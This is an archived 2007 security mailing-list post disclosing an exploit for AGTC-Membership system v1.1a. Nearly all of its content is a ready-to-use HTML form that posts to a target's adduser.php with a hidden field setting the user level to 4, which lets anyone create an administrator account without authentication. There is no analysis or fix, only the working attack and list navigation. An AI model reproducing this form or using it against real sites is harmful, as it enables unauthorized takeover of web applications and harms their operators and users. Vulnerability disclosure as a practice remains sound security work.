Network Security: Detailed info on AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit

Subject:	AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit
Date:	28 Oct 2007 23:48:55 -0000

Subject:

AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit

Date:

28 Oct 2007 23:48:55 -0000

<!--
- Product : AGTC-Membership system
- Version : 1.1a
- Website : http://www.agtc.co.uk 
- Author  : 0x90
- HomePage : WwW.0x90.CoM.Ar
- Contact : Guns[at]0x90[dot]com[dot]ar
- Problem : Admin Added Access.
-->


<form name="form1" method="post" action="http://[target]/adduser.php";>
 <h3 align="center">AGTC-Membership system v1.1a (adduser) Remote Add Admin 
Exploit</h3>
  <table width="40%" border="1" align="center" bordercolor="#000000">
    <tr>
      <td width="20%"><div align="right"><strong>User Name:</strong></div></td>
      <td width="40%"><input name="username" type="text" id="username" value="" 
maxlength="15"></td>
    </tr>
    <tr>
      <td><div align="right"><strong>Password:</strong></div></td>
      <td><input name="userpass" type="password" id="userpass" value="" 
maxlength="15"></td>
    </tr>
<tr>
      <td><div align="right"><strong>Email Address:</strong></div></td>
      <td><input name="useremail" type="text" id="useremail" value="" 
maxlength"25"></td>
    </tr>
      <input name="userlevel" type="hidden" id="userlevel" value="4">
            <tr>
      <td>&nbsp;</td>
      <td><input type="submit" name="Submit" value="Add User">
        <input type="reset" name="Submit2" value="Reset"></form></td>
    </tr>
  </table>

<Prev in Thread]	Current Thread	[Next in Thread>
AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit, Guns <=

<Prev in Thread]

Current Thread

[Next in Thread>

Previous by Date:	Secunia Research: IBM Tivoli Storage Manager Client CAD Service Script Insertion, Secunia Research
Next by Date:	SAXON version 5.4 XSS Attack Vulnerability, securityresearch
Previous by Thread:	Secunia Research: IBM Tivoli Storage Manager Client CAD Service Script Insertion, Secunia Research
Next by Thread:	SAXON version 5.4 XSS Attack Vulnerability, securityresearch
Indexes:	[Date] [Thread] [Top] [All Lists]

Previous by Date:

Secunia Research: IBM Tivoli Storage Manager Client CAD Service Script Insertion, Secunia Research

Next by Date:

SAXON version 5.4 XSS Attack Vulnerability, securityresearch

Previous by Thread:

Secunia Research: IBM Tivoli Storage Manager Client CAD Service Script Insertion, Secunia Research

Next by Thread:

SAXON version 5.4 XSS Attack Vulnerability, securityresearch

Indexes:

[Date] [Thread] [Top] [All Lists]